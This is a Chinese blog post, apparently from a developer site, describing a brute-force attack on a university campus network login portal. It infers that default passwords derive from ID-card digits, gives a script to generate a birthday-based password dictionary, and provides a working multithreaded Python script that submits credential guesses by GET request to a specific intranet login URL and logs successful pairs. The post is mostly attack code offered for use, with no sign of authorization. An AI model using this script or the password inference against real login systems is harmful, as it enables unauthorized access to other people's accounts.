登录页爆破
某高校校园内网登录默认密码为身份证后八位的前七位
推断密码为生日加三位随机数,生成密码字典
f = open('password.txt', mode='a+')
for i in range(int(input()), int(input())):
f.write('0' + str(i) + '\n')
f.close
通过WireShark抓包发现页面通过get请求提交参数,编写爆破脚本
import json
import re
import threading
import time
import requests
file1 = open('username.txt', mode='r', encoding='utf-8')
file2 = open('password.txt', mode='r', encoding='utf-8')
def dump_username():
dic_username = file1.readlines()
for i in range(len(dic_username)):
dic_username[i] = dic_username[i].strip('\n')
return dic_username
def dump_password():
dic_password = file2.readlines()
for i in range(len(dic_password)):
dic_password[i] = dic_password[i].strip('\n')
return dic_password
def brute(session, username: str, password: str):
url = 'http://10.255.0.19/drcom/login?callback=dr1003&DDDDD=' + username + '&upass=' + password + '&0MKKey=123456&R1=0&R3=0&R6=0¶=00&v6ip=&v='
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Referer': 'http://10.255.0.19/a79.htm'}
r = session.get(url=url, headers=headers, verify=False)
print(str(r.status_code) + '\t' + str(len(r.text)) + '\t' +
username + '\t' + password + '\t', end='\t')
s = re.findall(r'\((.*?)\)', r.text)
j = json.loads(s[0])
status = j['result']
print(status)
if status == 1:
with open('result.txt', mode='a+') as f:
f.write(username + '\t' + password)
if len(r.text) != 2930:
exit(0)
if __name__ == '__main__':
dic_username = dump_username()
dic_password = dump_password()
session = requests.session()
for username in dic_username:
for password in dic_password:
t = threading.Thread(target=brute, args=(session, username, password))
t.start()
time.sleep(0.005)
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
